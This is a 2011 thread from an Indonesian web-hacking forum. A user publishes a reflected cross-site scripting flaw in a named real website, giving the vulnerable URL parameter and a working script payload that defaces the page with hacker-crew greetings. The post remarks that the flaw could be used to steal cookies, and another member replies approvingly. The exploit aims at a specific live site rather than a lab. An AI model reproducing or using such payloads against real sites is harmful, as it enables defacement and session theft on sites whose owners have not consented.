[ { NUM_COMMENT }]
Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
by Darkzzzz » Thu Nov 10, 2011 12:14 am
Terdapat celah keamanan yang kritis berupa Cross Site Scripting yang bersifat Non-Persistent pada Website KRL Care Center. Walaupun tidak terlalu berbahaya, celah keamanan ini dapat menyebabkan XSS Defacing secara temporer ataupun hanya sekedar mencuri cookie saja. Sayangnya celah XSS ini hanya berjalan pada beberapa Web Browser saja, misalnya : Mozilla Firefox
Poc
- Code: Select all
Proof of Concept :
http://www.krl.co.id/infonew/undang.php?&start=0&p_f=0&t_cari=0&field_id=0&no=[b]Sisipkan Script Di Sini[/b]&kode_kondisi=0
Demo :
- Code: Select all
www.krl.co.id/infonew/undang.php?&start=0&p_f=0&t_cari=0&field_id=0&no=<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : XCode, Hacker Cisadane, Depok Cyber, Muslim Hackers, Dunia Santai, Borneo Crew, Jiban Crew, etc<br/>Please patch your system";</script>&kode_kondisi=0
Hasil :

I'm not A Hacker, But I'm A 
-

Darkzzzz
-
- Posts: 2206
- Joined: Fri Jul 27, 2007 1:59 pm
- Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
-
by ladade » Thu Nov 24, 2011 8:17 pm
wkwkwkmantap joinan ah
ciakakakakakak
sloganku GO A HACK
-
ladade
-
- Posts: 36
- Joined: Thu Nov 17, 2011 10:43 pm
- Location: denpasar
-
by Darkzzzz » Fri Nov 25, 2011 8:37 pm
ladade wrote:wkwkwkmantap joinan ah
ciakakakakakak
hahahah silahkan om dikembangkan
I'm not A Hacker, But I'm A 
-

Darkzzzz
-
- Posts: 2206
- Joined: Fri Jul 27, 2007 1:59 pm
- Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
-
Return to Web Hacking
Who is online
Users browsing this forum: No registered users and 16 guests